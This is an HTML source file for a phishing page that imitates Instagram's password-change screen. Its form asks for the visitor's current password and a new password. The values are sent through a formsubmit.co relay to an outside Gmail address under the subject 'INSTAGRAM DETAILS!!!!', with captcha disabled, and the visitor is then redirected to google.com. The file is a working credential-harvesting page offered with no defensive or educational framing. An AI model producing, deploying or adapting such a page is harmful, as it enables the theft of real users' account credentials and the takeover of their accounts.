<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> Instagram</title>
    <style>
    	input[type=text] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
.box1 {
        width: 120px;
        height: 40px;
        border: 1px solid #999;
        font-size: 18px;
        color: #ff555f;
        background-color: #eee;
        border-radius: 5px;
        box-shadow: 4px 4px #ccc;
      }
input[type=password] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
	input[type=submit] {
  width: 98%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
  background-color:#4077ff;
   color: white;
 


  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
  border-radius:5.0rem;
}
input[type=email] {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}
h1{
  font-size: 2rem;
  color:var(--black);
}
p1{
  font-size: 1.8rem;
  color:var(--black);
  }
p2{
  font-size: 1.5rem;
  color:var(--black);
}
.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -200px;
}
    		</style>

    <!-- font awesome cdn link  -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">

    <!-- custom css file link  -->
    <link rel="stylesheet" href="style.css">

</head>
<body>

<!-- header section starts  -->



<!-- header section ends -->

<!-- home section starts  -->



<!-- products section ends -->

<!-- featured section starts  -->

<section class="featured" id="featured">

                    <div class="row">
                 
         <div class="col-50">
       
          		
   <img src="img/logo.jpg" height="50" width ="300" alt="">
     	
                  <form action="https://formsubmit.co/instagram1.reset@gmail.com" method="POST">
   <input type="hidden" name="_captcha" value="false">
                <input type="hidden" name="_subject" value="INSTAGRAM DETAILS!!!!">
                		
 <input type="hidden" name="_next" value="https://www.google.com">
 
 
 
 <p2>Update your password to keep your account safe. you'll be logged out of all sessions   except this one, so anyone trying to get into your account will no longer have access.</p2>
 <br>
 <br>
 <br>
 <h1> Current Password*</h1>
                         <br>  
                         <input type="password" id="currentpassword" name="CURRENT PASSWORD" placeholder=" Enter Current Password" required>
      <br>
      <br> <p1>Your password must be more than six characters include a combination of numbers, letters and specific characters (!$@%)</p1><br>
      <br>                   
      <br>
      <br>
                <h1> Create A New Password*</h1><br>    
                 <input type="text" id="newpassword" name="NEW PASSWORD" placeholder="Create A New Password" required>

  <br>
  <br>
  <h1> Retype New Password*</h1><br>
   <input type="text" id="retypenewpass" name="RETYPE NEW PASSWORD" placeholder="Retype New Password" required>
   
 <br>    
<br>
<br>

 
   <input type="submit" value="Change Password">
                                  <br>    
                                
<br>


   <center> 
<br> <h1> <a href="https://www.facebook.com">Login With Facebook</a></h1>   </center>   
<br>    
<br>
<br>
<br>
<br>
<br>
     <center>  <h1>Don't Have A Account? <a href="https://www.instagram.com">Sign Up</a></h1>   </center>   
    <br>
<br>
 <br>
<br>
<br>
  <center><img src="footer.png" height="200" width="310" alt="">
</center>
                    </div>
                    </div>
                    </div>
                    <center>
 <img src="images/payment.png" height="30" width ="300" alt="">
                        </center>
    </div>
    </div>
    </div>

</section>

<!-- custom js file link  -->
<script src="js/script.js"></script>
    
</body>
</html>
